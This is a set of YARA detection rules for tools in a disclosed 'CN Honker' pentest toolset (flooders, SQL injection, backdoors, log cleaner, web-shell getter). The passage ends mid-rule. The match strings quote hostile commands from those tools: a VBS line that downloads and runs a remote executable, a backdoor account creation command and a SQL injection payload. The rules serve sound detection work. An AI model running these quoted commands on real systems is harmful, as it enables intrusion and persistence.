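rule CN_Honker_NetFuke_NetFuke {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file NetFuke.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "f89e223fd4f6f5a3c2a2ea225660ef0957fc07ba"
      id = "833da5c7-e562-50e9-a2a9-54c36b0d1f61"
   strings:
      $s1 = "Mac Flood: Flooding %dT %d p/s " fullword ascii
      $s2 = "netfuke_%s.txt" fullword ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 1840KB and all of them
}

rule CN_Honker_ManualInjection {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file ManualInjection.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "e83d427f44783088a84e9c231c6816c214434526"
      id = "f0899003-824f-56ed-b653-9f7a77b9ec6a"
   strings:
      $s0 = "http://127.0.0.1/cookie.asp?fuck=" fullword ascii /* PEStudio Blacklist: strings */
      $s16 = "http://Www.cnhuker.com | http://www.0855.tv" fullword ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 3000KB and all of them
}

rule CN_Honker_CnCerT_CCdoor_CMD {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file CnCerT.CCdoor.CMD.dll"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "1c6ed7d817fa8e6534a5fd36a94f4fc2f066c9cd"
      id = "ddd328a8-7ad8-5b26-9deb-3e5da801cd1b"
   strings:
      $s2 = "CnCerT.CCdoor.CMD.dll" fullword wide
      $s3 = "cmdpath" fullword ascii
      $s4 = "Get4Bytes" fullword ascii
      $s5 = "ExcuteCmd" fullword ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 22KB and all of them
}

rule CN_Honker_termsrvhack {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file termsrvhack.dll"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "1c456520a7b7faf71900c71167038185f5a7d312"
      id = "4fd582a1-3c6d-57a1-bba0-f775bb61ef00"
   strings:
      $s1 = "The terminal server cannot issue a client license. It was unable to issue the" wide /* PEStudio Blacklist: strings */
      $s6 = "%s\\%s\\%d\\%d" fullword wide
   condition:
      uint16(0) == 0x5a4d and filesize < 1052KB and all of them
}

rule CN_Honker_IIS6_iis6 {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file iis6.com"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "f0c9106d6d2eea686fd96622986b641968d0b864"
      id = "f5d49cbd-1aec-5126-ab5d-83e485fa6869"
   strings:
      $s0 = "GetMod;ul" fullword ascii
      $s1 = "excjpb" fullword ascii
      $s2 = "LEAUT1" fullword ascii
      $s3 = "EnumProcessModules" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 410 times */
   condition:
      uint16(0) == 0x5a4d and filesize < 50KB and all of them
}

rule CN_Honker_struts2_catbox {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file catbox.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "ee8fbd91477e056aef34fce3ade474cafa1a4304"
      id = "24df7a11-5ec4-5e7b-86f6-6195ca01b8f9"
   strings:
      $s6 = "'Toolmao box by gainover www.toolmao.com" fullword ascii
      $s20 = "{external.exeScript(_toolmao_bgscript[i],'javascript',false);}}" fullword ascii /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 8160KB and all of them
}

rule CN_Honker_getlsasrvaddr {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file getlsasrvaddr.exe - WCE Amplia Security"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      modified = "2022-12-21"
      score = 70
      hash = "a897d5da98dae8d80f3c0a0ef6a07c4b42fb89ce"
      id = "fa0c0376-c5c3-5b48-b03e-86cefb547479"
   strings:
      $s8 = "pingme.txt" fullword ascii /* PEStudio Blacklist: strings */
      $s16 = ".\\lsasrv.pdb" ascii
      $s20 = "Addresses Found: " fullword ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 100KB and all of them
}

rule CN_Honker_ms10048_x64 {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file ms10048-x64.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "418bec3493c85e3490e400ecaff5a7760c17a0d0"
      id = "b65b0bad-d74c-5e7a-a613-69ef80585c23"
   strings:
      $s1 = "[ ] Creating evil window" fullword ascii
      $s2 = "[+] Set to %d exploit half succeeded" fullword ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 125KB and all of them
}

rule CN_Honker_LogCleaner {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file LogCleaner.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "ab77ed5804b0394d58717c5f844d9c0da5a9f03e"
      id = "63ec5e47-9f3e-547a-bbff-cac8b27ac8f7"
   strings:
      $s3 = ".exe [(path]" fullword ascii
      $s4 = "LogCleaner v" ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 250KB and all of them
}

rule CN_Honker_shell_brute_tool {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file shell_brute_tool.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "f6903a15453698c35dce841e4d09c542f9480f01"
      id = "80fd0c9f-0ed9-5308-ac72-65b9b3b47ed1"
   strings:
      $s0 = "http://24hack.com/xyadmin.asp" fullword ascii /* PEStudio Blacklist: strings */
      $s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii /* PEStudio Blacklist: agent */
   condition:
      uint16(0) == 0x5a4d and filesize < 1000KB and all of them
}

rule CN_Honker_hxdef100 {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file hxdef100.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "bf30ccc565ac40073b867d4c7f5c33c6bc1920d6"
      id = "3b931752-85ae-52d0-9deb-1a1b03b39e32"
   strings:
      $s6 = "BACKDOORSHELL" fullword ascii /* PEStudio Blacklist: strings */
      $s15 = "%tmpdir%" fullword ascii
      $s16 = "%cmddir%" fullword ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 200KB and all of them
}

rule CN_Honker_Arp_EMP_v1_0 {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file Arp EMP v1.0.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "ae4954c142ad1552a2abaef5636c7ef68fdd99ee"
      id = "03782e94-4fac-529f-b235-19cdb124d53b"
   strings:
      $s0 = "Arp EMP v1.0.exe" fullword wide
   condition:
      uint16(0) == 0x5a4d and filesize < 400KB and all of them
}

rule CN_Honker_GetWebShell {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file GetWebShell.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "b63b53259260a7a316932c0a4b643862f65ee9f8"
      id = "919883f4-af66-5d07-ad41-8cba3e049396"
   strings:
      $s0 = "echo P.Open \"GET\",\"http://www.baidu.com/ma.exe\",0 >>run.vbs" fullword ascii /* PEStudio Blacklist: strings */
      $s5 = "http://127.0.0.1/sql.asp?id=1" fullword wide /* PEStudio Blacklist: strings */
      $s14 = "net user admin$ hack /add" fullword wide /* PEStudio Blacklist: strings */
      $s15 = ";Drop table [hack];create table [dbo].[hack] ([cmd] [image])--" fullword wide /* PEStudio Blacklist: strings */
   condition:
      uint16(0) == 0x5a4d and filesize < 70KB and 1 of them
}

rule CN_Honker_Cracker_SHELL {
   meta:
      description = "Sample from CN Honker Pentest Toolset - file SHELL.exe"
      license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
      author = "Florian Roth (Nextron Systems)"
      reference = "Disclosed CN Honker Pentest Toolset"
      date = "2015-06-23"
      score = 70
      hash = "c1dc349ff44a45712937a8a9518170da8d4ee656"
      id = "2249a058-7469-5054-9c51-cb20ef8197ca"
   strings:
      $s1 = "http://127.0.0.1/error1.asp" fullword ascii /* PEStudio Blacklist: strings */
      $s2 = "password,PASSWORD,pass,PASS,Lpass,lpass,Password" fullword wide /* PEStudio Blacklist: strings */
      $s3 = "\\SHELL" wide /* PEStudio Blacklist: strings */
      $s4 = 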
"WebBrowser1" fullword ascii /* PEStudio Blacklist: strings */ condition: uint16(0) == 0x5a4d and filesize < 200KB and all of them } rule CN_Honker_MSTSC_can_direct_copy { meta: description = "Sample from CN Honker Pentest Toolset - file MSTSC_can_direct_copy.EXE" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" modified = "2022-12-21" score = 70 hash = "2f3cbfd9f82f8abafdb1d33235fa6bfa1e1f71ae" id = "9155cb6f-14b6-524a-9cb9-1a88f7facf4e" strings: $s1 = "srv\\newclient\\lib\\win32\\obj\\i386\\mstsc.pdb" ascii $s2 = "Clear Password" fullword wide /* PEStudio Blacklist: strings */ $s3 = "/migrate -- migrates legacy connection files that were created with " fullword wide /* PEStudio Blacklist: strings */ condition: uint16(0) == 0x5a4d and filesize < 600KB and all of them } rule CN_Honker_lcx_lcx { meta: description = "Sample from CN Honker Pentest Toolset - HTRAN - file lcx.exe" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" author = "Florian Roth (Nextron Systems)" reference = "Disclosed CN Honker Pentest Toolset" date = "2015-06-23" score = 70 hash = "0c8779849d53d0772bbaa1cedeca150c543ebf38" id = "6c2e1e85-6387-5be2-b7b2-5ae8a5cca6df" strings: $s1 = "%s -